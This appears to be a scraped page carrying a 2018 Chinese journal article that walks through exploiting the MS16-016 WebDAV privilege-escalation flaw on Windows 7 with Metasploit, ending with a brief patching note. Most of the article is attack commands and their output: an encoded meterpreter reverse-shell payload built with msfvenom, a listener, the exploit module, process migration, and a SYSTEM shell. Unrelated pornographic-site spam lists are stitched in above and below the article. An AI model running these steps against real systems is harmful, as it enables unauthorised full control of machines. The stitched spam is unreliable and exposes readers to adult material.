999精品在线视频,手机成人午夜在线视频,久久不卡国产精品无码,中日无码在线观看,成人av手机在线观看,日韩精品亚洲一区中文字幕,亚洲av无码人妻,四虎国产在线观看 ?

基于Metasploit的MS16-016本地溢出漏洞利用實戰

2018-01-20 06:42:04趙秋
電腦知識與技術 2018年31期
關鍵詞:程序設置利用

趙秋

摘要: 該文對MS16-016本地溢出漏洞做了簡單介紹,文中分析了利用MS16-016本地溢出漏洞,滲透到Windows 7中并獲取系統權限的實現方式,最后給出了對應的防范措施。

關鍵詞: Metasploit;MS16-016;本地溢出漏洞

中圖分類號:TP393? ? ? 文獻標識碼:A? ? ? 文章編號:1009-3044(2018)31-0216-01

1 漏洞介紹

MS16-016這個漏洞是由于Windows中的WebDAV未正確處理WebDAV客戶端發送的信息導致的。若要利用此漏洞,攻擊者首先必須登錄系統。然后,攻擊者可以運行一個為利用此漏洞而經特殊設計的應用程序,從而控制受影響的系統。此漏洞存在于在:Windows Vista SP2、Windows Server 2008 x86 & x64、Windows Server 2008 R2 x64、Windows 7 x86 & x64、Windows 8.1 x86 & x64。系統中提升權限至系統權限,以下系統中導致系統拒絕服務(藍屏):Windows Server 2012、Windows Server 2012 R2、Windows RT 8.1、Windows 10。

2 MS16-016本地溢出漏洞利用的實現

下面介紹在Kali中滲透Windows 7 x86的實現。Kali的IP地址為10.3.81.106,Windows 7 x86的IP地址為10.3.81.152,使用虛擬機kali 中的Metasploit利用MS16-016本地溢出漏洞對Windows 7的進行滲透,從而獲得系統權限。

1) 在Kali上生成連接軟件msf.exe,LHOST為Kali的IP地址

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.3.81.106 LPORT=4444 -f exe > msf.exe

2)在命令行下輸入“msfconsole”,進入MSF的啟動界面

root@kali:~# msfconsole

3)在Metasploit命令提示符下,使用use命令載入監聽模塊。設置payload為windows/meterpreter/reverse_tcp。設置本地監聽主機IP地址為Kali的IP。可以使用show options查看相關參數,輸入exploit命令開始監聽。

4)將軟件msf.exe發給Windows 7上運行,此時kali上會有連接提示,可以看見MSF彈回了一個session 1(會話連接)。接著,在Meterpreter Shell中利用getuid命令查看已獲得的權限為user權限。我們要把它提升到system權限,即Windows最高權限。

5)輸入命令background,把當前的metasploit shell轉為后臺執行。選擇MS16-016這個漏洞在進行提權,同時設置剛才連接的ID為1。最后,執行exploit命令進行提權,可以看到成功的把漏洞利用到了PID為2872的進程中。

6)雖然提權成功了,但連接到的ID為1的會話連接中,執行getuid命令還是看見的是user權限。

msf exploit(windows/local/ms16_016_webdav) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > getuid

Server username: cmx-PC\cmx

7)使用migrate 命令,遷移到該進程ID中。

meterpreter > migrate 2872

[*] Migrating from 4068 to 2872...

[*] Migration completed successfully.

8)然后執行getuid命令再次查看權限,可以看到已經是系統權限了,輸入shell測試。

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

meterpreter > shell

Process 608 created.

Channel 1 created.

Microsoft Windows [版本 6.1.7601]

版權所有 (c) 2009 Microsoft Corporation。保留所有權利。

C:\Users\cmx\Desktop>

3 MS16-016本地溢出漏洞的防御

你也可以通過 Windows 更新獲取此更新程序。在你開啟自動更新后,系統會自動下載并安裝此更新程序。https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2016/ms16-016用戶可從此獲取獨立的更新程序包。此安全更新程序通過更正WebDAV驗證輸入的方式來修復這個漏洞。

參考文獻:

[1] 祝烈煌,張子劍.網絡攻防實戰研究漏洞利用與提權[M].北京:電子工業出版社,2018.

[2][英]Nipun Jaswal,李華峰.精通Metasploit滲透測試[M]. 2版.北京:人民郵電出版社,2017.

[3] http://www.freebuf.com/vuls/95950.html.

猜你喜歡
程序設置利用
利用min{a,b}的積分表示解決一類絕對值不等式
中等數學(2022年2期)2022-06-05 07:10:50
中隊崗位該如何設置
少先隊活動(2021年4期)2021-07-23 01:46:22
利用一半進行移多補少
試論我國未決羈押程序的立法完善
人大建設(2019年12期)2019-05-21 02:55:44
利用數的分解來思考
Roommate is necessary when far away from home
“程序猿”的生活什么樣
英國與歐盟正式啟動“離婚”程序程序
環球時報(2017-03-30)2017-03-30 06:44:45
本刊欄目設置說明
中俄臨床醫學專業課程設置的比較與思考
主站蜘蛛池模板: 国产系列在线| 最新国语自产精品视频在| 成人精品午夜福利在线播放| 丁香六月激情婷婷| 在线日本国产成人免费的| 国产乱码精品一区二区三区中文 | 99这里只有精品免费视频| 免费观看成人久久网免费观看| 97免费在线观看视频| 视频一区视频二区日韩专区| 日本一本在线视频| 国产亚洲欧美日韩在线一区二区三区| 91视频青青草| 久久亚洲美女精品国产精品| 无码免费视频| 国产精品久线在线观看| 国产一区自拍视频| 亚洲国产成熟视频在线多多| 国产波多野结衣中文在线播放| 久久综合色88| 国产无遮挡猛进猛出免费软件| 噜噜噜久久| 四虎永久免费网站| 亚洲人网站| 这里只有精品在线播放| 国产18页| 成·人免费午夜无码视频在线观看| 无码中文字幕精品推荐| 国产原创自拍不卡第一页| 国产福利小视频高清在线观看| 欧美精品在线免费| 国产日韩精品欧美一区喷| 日韩不卡免费视频| 亚洲AV电影不卡在线观看| 成人福利在线视频| 91外围女在线观看| 97se亚洲| 最新无码专区超级碰碰碰| 国产丝袜啪啪| 亚洲人成网站日本片| 欧美精品H在线播放| 高潮毛片免费观看| 欧美一道本| 国产第一色| 国产美女91呻吟求| 丝袜高跟美脚国产1区| 日本精品视频| 国产成人a毛片在线| 亚洲天堂啪啪| 久久永久免费人妻精品| 日韩成人在线网站| 国产欧美精品一区二区| 9久久伊人精品综合| 国产69精品久久| 精品一区二区无码av| 欧美性色综合网| 国产精品久久自在自线观看| 黄色免费在线网址| 国产精品欧美亚洲韩国日本不卡| 欧美a在线看| 欧美另类精品一区二区三区| 免费一级毛片不卡在线播放| 久久免费精品琪琪| 97久久精品人人| 免费a级毛片18以上观看精品| 久久福利网| 国产免费久久精品99re不卡 | 五月婷婷亚洲综合| 毛片卡一卡二| 亚洲欧美成人综合| 亚洲色欲色欲www网| 亚洲第一色视频| 国产亚洲精品无码专| 国产区在线看| 91色在线观看| 色婷婷电影网| 国产色爱av资源综合区| 亚洲AⅤ无码国产精品| 青青青国产在线播放| 在线视频亚洲色图| 欧美全免费aaaaaa特黄在线| 熟妇无码人妻|